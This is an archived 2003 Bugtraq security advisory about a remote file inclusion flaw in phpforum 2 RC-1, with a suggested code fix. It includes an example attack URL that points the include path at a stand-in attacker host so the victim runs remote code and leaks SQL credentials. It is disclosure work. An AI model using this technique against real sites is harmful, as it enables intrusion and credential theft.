lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030710165609.D585937F1C@www.fastmail.fm>
Date: Thu, 10 Jul 2003 08:56:09 -0800
From: "theblacksheep" <theblacksheep@...tmail.fm>
To: bugtraq@...urityfocus.com
Subject: PHP-Include-Hack-Possibility in phpforum 2 RC-1


 ================================================
<------------------------------------------------>
<------------#www.bright-shadows.net#------------>
<------------------------------------------------>
<--------------#theblacksheep&erik#-------------->
<------------------------------------------------>
 ================================================

Advisory Information
--------------------
Advisory Name      : PHP-Include-Hack-Possibility in phpforum 2 RC-1
Author             : Marc Bromm <theblacksheep@...tmail.fm> Germany
Discover by        : Marc Bromm <theblacksheep@...tmail.fm> Germany
Release Date       : 10. Juli 2003
Application        : phpforum 2 RC-1
Vendor Homepage    : http://www.phpmyforum.de/
Vendor Status      : notified
Vulnerable Versions: phpforum 2 RC-1 (maybe older)
Platforms          : OS Independent, PHP
Severity           : High

######Overview:

The phpforum is a mySQL based forum with a lot of functions.

######Exploit:

1. Exploitable file

The exploitable file is the "mainfile.php". The first 2 lines are:

----------------------------------------
<?php
include("$MAIN_PATH/config.php");    //Konfiguration
----------------------------------------

So it is possible to set $MAIN_PATH to everything.
For example:

-> www.victim.com/forum/mainfile.php?MAIN_PATH=http://www.attack.com

Then you need only a "config.php" file with the code you like to execute.
So you can get for example the SQL server password and the username which
are stored in the "config.inc.php" file.
But it is necessary that the attacking webserver (evilhost) can't be
running PHP
or the code will be run on the attacking machine rather than the target
machine.

######Solution:

Change
-----------------------------------
include("$MAIN_PATH/config.php");    //Konfiguration
-----------------------------------
to
-----------------------------------
include("config.php");    //Konfiguration
-----------------------------------
cause the config file is in the same folder as the mainfile.

Greetz to:

Erik, (O_o)oOoOoOo.
-- 
  
  theblacksheep@...tmail.fm

-- 
http://www.fastmail.fm - mmm... Fastmail...


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ